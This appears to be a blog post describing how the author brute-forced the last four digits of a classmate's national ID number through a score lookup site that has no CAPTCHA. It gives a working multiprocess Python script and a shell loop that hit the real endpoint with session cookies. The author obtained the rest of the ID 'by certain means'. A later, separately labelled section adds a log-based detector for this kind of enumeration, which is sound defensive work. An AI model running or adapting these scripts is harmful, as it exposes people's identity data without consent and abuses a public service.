mingjun97's blog

Miscellaneous notes from day-to-day problem solving

High-concurrency API test script

Having obtained, by certain means, the first 6 digits of a classmate's ID card number and their birthday, and relying on the business-logic flaw that the Putonghua (Mandarin) proficiency test score lookup system requires no CAPTCHA, I confirmed that the classmate had taken the test and then wrote the following Python script to brute-force the last four digits of their ID card number.

# -*- coding: utf-8 -*- 
import os
from multiprocessing import Process

def inquiry(id):
    # one curl per candidate suffix; the candidate is appended to the fixed
    # 14-digit idCard prefix (region code + birth date, redacted here as xxxxxx)
    r = os.popen(r"curl 'http://www.cltt.org/StudentScore/ScoreResult' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Origin: http://www.cltt.org' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://www.cltt.org/studentscore' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8,en;q=0.7,zh-TW;q=0.6' -H 'Cookie: aliyungf_tc=AQAAANWP1Fs2jA4A7itfR5Mbkqy5xaQh; ASP.NET_SessionId=iplra4tpuhk0bhlmel3kqdlk' --data 'name=URLENCODED&stuID=&idCard=xxxxxx"+str(id)+"' --compressed")
    # the result page contains "考试时间" (exam date) only when a score record exists
    if "考试时间" in r.read():
        print(id)
    # print(r)

if __name__ == "__main__":
    # 1000..9999 inclusive (range() excludes its upper bound), one process per candidate
    for i in range(1000, 10000):
        p = Process(target=inquiry, args=(i,))
        p.start()

Run it with the following command:

python test.py > result

Afterwards a file named result appears in the directory; view it with cat.

Addendum

A single-threaded traversal with a shell script turned out to be very slow (roughly 4000 seconds to cover 1000~9999), so I abandoned it. The script is posted here anyway.

for ((i=2000;i<=9999;i++)); do
  echo $i
  # the candidate suffix must sit outside the single quotes, otherwise the literal text `echo $i` is sent
  curl 'http://www.cltt.org/StudentScore/ScoreResult' -H 'Connection: keep-alive' -H 'Cache-Control: max-age=0' -H 'Origin: http://www.cltt.org' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8' -H 'Referer: http://www.cltt.org/studentscore' -H 'Accept-Encoding: gzip, deflate' -H 'Accept-Language: zh-CN,zh;q=0.9,ja;q=0.8,en;q=0.7,zh-TW;q=0.6' -H 'Cookie: aliyungf_tc=AQAAANWP1Fs2jA4A7itfR5Mbkqy5xaQh; ASP.NET_SessionId=iplra4tpuhk0bhlmel3kqdlk' --data 'name=URLENCODED&stuID=&idCard=xxxxxx19971020'"$i" --compressed | grep "考试时间"
done
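Seen from the server side, the traffic produced by either script above (many lookups that differ only in the last four digits of idCard, all within minutes) is easy to spot in access logs. The detector below is an added example, not code from the original post; its log format, the client-IP grouping key and the sample log lines are constructed assumptions.

```python
"""Flag national-ID suffix enumeration against a score-lookup endpoint.
The sweep on this page keeps the first 14 ID digits (region + birth date) fixed
and guesses the last four, so server-side it is a burst of POSTs whose idCard
values share one 14-digit prefix. Count distinct suffixes per (client, prefix)
inside a time window and flag the group when the count reaches a threshold.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Assumed log format: "<ISO timestamp> <client ip> POST <path> idCard=<18 digits>"
LINE_RE = re.compile(r"^(\S+) (\S+) POST (\S+) idCard=(\d{18})$")
LOOKUP_PATH = "/StudentScore/ScoreResult"  # endpoint the scripts on this page query

def parse(line):
    """Return (timestamp, client, path, prefix, suffix), or None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts, client, path, idcard = m.groups()
    return datetime.fromisoformat(ts), client, path, idcard[:14], idcard[14:]

def find_enumeration(lines, threshold=20, window=timedelta(minutes=5)):
    """Return {(client, prefix): max distinct suffixes seen inside one window}."""
    events = defaultdict(list)
    for line in lines:
        ev = parse(line)
        if ev and ev[2] == LOOKUP_PATH:
            events[(ev[1], ev[3])].append((ev[0], ev[4]))
    flagged = {}
    for key, evs in events.items():
        evs.sort()  # sliding window over time-ordered (timestamp, suffix) pairs
        lo = 0
        for hi in range(len(evs)):
            while evs[hi][0] - evs[lo][0] > window:
                lo += 1
            distinct = len({suffix for _, suffix in evs[lo:hi + 1]})
            if distinct >= threshold:
                flagged[key] = max(flagged.get(key, 0), distinct)
    return flagged

def sample_log():
    """Constructed log: one ordinary lookup, then one client sweeping 30 suffixes."""
    base = datetime(2018, 9, 1, 10, 0, 0)
    lines = [f"2018-09-01T09:55:00 198.51.100.7 POST {LOOKUP_PATH} idCard=310101198505057890"]
    for n in range(1000, 1030):  # one guess per second, same 14-digit prefix
        ts = (base + timedelta(seconds=n - 1000)).isoformat()
        lines.append(f"{ts} 203.0.113.5 POST {LOOKUP_PATH} idCard=11010119900101{n}")
    return lines
```

Grouping by session cookie instead of client IP works the same way; the script on this page reuses one ASP.NET_SessionId for every request, so either key catches it.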
